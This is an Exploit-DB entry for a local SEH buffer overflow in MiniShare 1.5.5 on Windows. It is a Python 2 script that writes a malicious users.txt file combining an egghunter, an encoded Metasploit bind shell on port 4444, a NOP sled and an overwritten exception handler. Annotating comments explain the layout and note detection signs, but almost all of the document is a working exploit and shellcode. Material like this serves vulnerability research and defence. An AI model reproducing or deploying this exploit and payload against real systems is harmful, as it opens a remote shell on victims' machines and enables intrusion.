MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (Egghunter)

EDB-ID:

15575

CVE:

N/A


Author:

0v3r

Type:

local


Platform:

Windows

Date:

2010-11-19


# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
# Date: 11/19/2010
# Author: 0v3r
# Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

# Just rewrote the exploit using egghunter to inject a bind shell payload 
# Bug found by Chris Gabriel credit goes to him
#
# To exploit just place the users.txt file in the Minishare root directory and run minishare.exe

# Payload builder for the users.txt overflow described in the header above.
# Everything below is Python 2 syntax (print statements, str used as a raw
# byte container); it is a SyntaxError under Python 3 and is kept byte-for-byte
# as published here.
#
# 32-byte memory-search stub. The 4-byte marker on its middle line ("w00t")
# is what it scans for; per the layout comment further down, the real marker
# (`egg`) sits directly in front of the shellcode, so finding it hands control
# to the shellcode. Note the marker also occurs once inside this stub itself --
# the comment on `morenops` below appears to refer to that in-stub copy.
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # EGG w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com 
# Defender note: per the generator line above this is a bind shell, so a
# successful trigger shows up as minishare.exe opening a new TCP listener on
# port 4444 -- an easy host- and network-side detection artifact. The Alpha2
# encoder is why nearly all of the bytes below are printable ASCII; only the
# short decoder prefix on the first line is not.
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x43"
"\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x53\x42\x32\x42\x41\x32\x41"
"\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x7a\x49\x4b\x4c\x50"
"\x6a\x78\x6b\x72\x6d\x6b\x58\x6b\x49\x79\x6f\x6b\x4f\x49\x6f\x53"
"\x50\x4c\x4b\x30\x6c\x56\x44\x46\x44\x6e\x6b\x32\x65\x35\x6c\x4c"
"\x4b\x41\x6c\x67\x75\x44\x38\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x64"
"\x58\x6c\x4b\x71\x4f\x75\x70\x74\x41\x5a\x4b\x33\x79\x6c\x4b\x70"
"\x34\x4e\x6b\x57\x71\x4a\x4e\x56\x51\x6f\x30\x4f\x69\x4c\x6c\x6c"
"\x44\x69\x50\x71\x64\x44\x47\x4b\x71\x7a\x6a\x54\x4d\x63\x31\x58"
"\x42\x5a\x4b\x4b\x44\x37\x4b\x30\x54\x65\x74\x37\x58\x70\x75\x38"
"\x65\x4e\x6b\x53\x6f\x61\x34\x56\x61\x58\x6b\x30\x66\x6e\x6b\x76"
"\x6c\x50\x4b\x6c\x4b\x31\x4f\x75\x4c\x73\x31\x4a\x4b\x53\x33\x46"
"\x4c\x4e\x6b\x6c\x49\x32\x4c\x77\x54\x55\x4c\x45\x31\x4b\x73\x45"
"\x61\x4b\x6b\x55\x34\x4e\x6b\x37\x33\x30\x30\x4e\x6b\x51\x50\x64"
"\x4c\x6c\x4b\x52\x50\x45\x4c\x6e\x4d\x4e\x6b\x31\x50\x37\x78\x73"
"\x6e\x50\x68\x6c\x4e\x52\x6e\x74\x4e\x48\x6c\x52\x70\x49\x6f\x48"
"\x56\x41\x76\x30\x53\x30\x66\x35\x38\x74\x73\x76\x52\x30\x68\x70"
"\x77\x70\x73\x37\x42\x71\x4f\x73\x64\x49\x6f\x58\x50\x53\x58\x58"
"\x4b\x7a\x4d\x4b\x4c\x75\x6b\x42\x70\x79\x6f\x4e\x36\x73\x6f\x4e"
"\x69\x4d\x35\x55\x36\x4e\x61\x6a\x4d\x66\x68\x47\x72\x30\x55\x50"
"\x6a\x64\x42\x39\x6f\x48\x50\x33\x58\x6e\x39\x35\x59\x6a\x55\x4c"
"\x6d\x73\x67\x4b\x4f\x4b\x66\x76\x33\x62\x73\x66\x33\x70\x53\x53"
"\x63\x57\x33\x56\x33\x61\x53\x53\x63\x6b\x4f\x4a\x70\x51\x76\x63"
"\x58\x46\x71\x71\x4c\x72\x46\x63\x63\x6c\x49\x6b\x51\x4f\x65\x61"
"\x78\x4d\x74\x44\x5a\x32\x50\x59\x57\x51\x47\x6b\x4f\x58\x56\x72"
"\x4a\x32\x30\x50\x51\x42\x75\x6b\x4f\x68\x50\x42\x48\x4f\x54\x4e"
"\x4d\x44\x6e\x6d\x39\x33\x67\x4b\x4f\x68\x56\x76\x33\x73\x65\x79"
"\x6f\x6e\x30\x73\x58\x6b\x55\x33\x79\x4e\x66\x37\x39\x30\x57\x59"
"\x6f\x58\x56\x70\x50\x53\x64\x50\x54\x63\x65\x4b\x4f\x4e\x30\x4f"
"\x63\x72\x48\x78\x67\x62\x59\x7a\x66\x44\x39\x42\x77\x79\x6f\x48"
"\x56\x66\x35\x4b\x4f\x6a\x70\x30\x66\x50\x6a\x50\x64\x70\x66\x50"
"\x68\x71\x73\x62\x4d\x6d\x59\x78\x65\x32\x4a\x52\x70\x56\x39\x54"
"\x69\x58\x4c\x6f\x79\x68\x67\x51\x7a\x67\x34\x6f\x79\x6d\x32\x36"
"\x51\x6f\x30\x78\x73\x4c\x6a\x4b\x4e\x72\x62\x76\x4d\x4b\x4e\x63"
"\x72\x44\x6c\x6c\x53\x6c\x4d\x73\x4a\x75\x68\x6e\x4b\x6e\x4b\x6e"
"\x4b\x75\x38\x33\x42\x6b\x4e\x48\x33\x45\x46\x59\x6f\x32\x55\x47"
"\x34\x4b\x4f\x49\x46\x63\x6b\x41\x47\x61\x42\x70\x51\x71\x41\x72"
"\x71\x52\x4a\x36\x61\x70\x51\x30\x51\x33\x65\x70\x51\x6b\x4f\x4e"
"\x30\x51\x78\x6c\x6d\x5a\x79\x57\x75\x78\x4e\x53\x63\x49\x6f\x6a"
"\x76\x63\x5a\x49\x6f\x6b\x4f\x56\x57\x6b\x4f\x5a\x70\x6e\x6b\x42"
"\x77\x6b\x4c\x4b\x33\x6b\x74\x73\x54\x4b\x4f\x6e\x36\x36\x32\x6b"
"\x4f\x68\x50\x35\x38\x31\x6e\x4b\x68\x5a\x42\x44\x33\x72\x73\x6b"
"\x4f\x4e\x36\x4b\x4f\x7a\x70\x43")

# Sized so that nops + egghunter occupy exactly 386 bytes; with the `buff`
# layout below, file offset 386 is therefore where the next-SEH pointer and
# offset 390 where the handler pointer land. The 386 itself is the author's
# finding and is not derivable from this script.
nops     = "\x90" * (386 - len(egghunter))
morenops = "\x90" * 32             # need enough NOPs to overwrite the first instance of the egg
# Little-endian 0x004013E7. An address in the 0x00400000 range is presumably
# inside minishare.exe's own image -- TODO confirm against the binary -- which
# is what makes a fixed handler address usable: a module built with SafeSEH
# and ASLR, or a host with SEHOP enabled, would not let a borrowed
# POP/POP/RET be installed as an exception handler this way.
seh      = "\xE7\x13\x40\x00"      # POP POP RET
# "\xeb\xc0" is a 2-byte short jmp with signed displacement -64 (matches the
# "64 bytes" note); executed at offset 386 it lands at offset 324, inside the
# NOP sled 30 bytes ahead of the egghunter, which then runs. The two trailing
# NOPs only pad the 4-byte slot.
nseh     = "\xeb\xc0\x90\x90"      # short jump 64 bytes
# 8-byte marker (the 4-byte tag from the stub, twice). The shellcode follows
# it immediately, see the layout comment below.
egg      = "w00tw00t"              # the key the egghunter looks for

buff     = nops  + egghunter  +  nseh + seh  + morenops + egg + shellcode

#[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]

# Writes `buff` to ./users.txt and prints a banner. NOTE(review): the bare
# `except:` below swallows every error, including KeyboardInterrupt and
# SystemExit, and reports only a generic message, so the real cause (read-only
# directory, permissions, a bad path) is lost; a failed write() also leaves the
# handle open because close() is skipped. Kept byte-identical here.
try:
 	f = open("users.txt",'w')
	f.write(buff)
	f.close()

	print "\n"	
	print "\t---------------------------------------------------------------------------------"
	print "\t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |"
	print "\t---------------------------------------------------------------------------------"
	print "\n"
 
	print "\t- File 'users.txt' created..."
	print "\t- Place the 'users.txt' file in the Minishare directory and run the program...\n" 
except:
	print "\t-Oooops! Can't write file 'users.txt'...\n"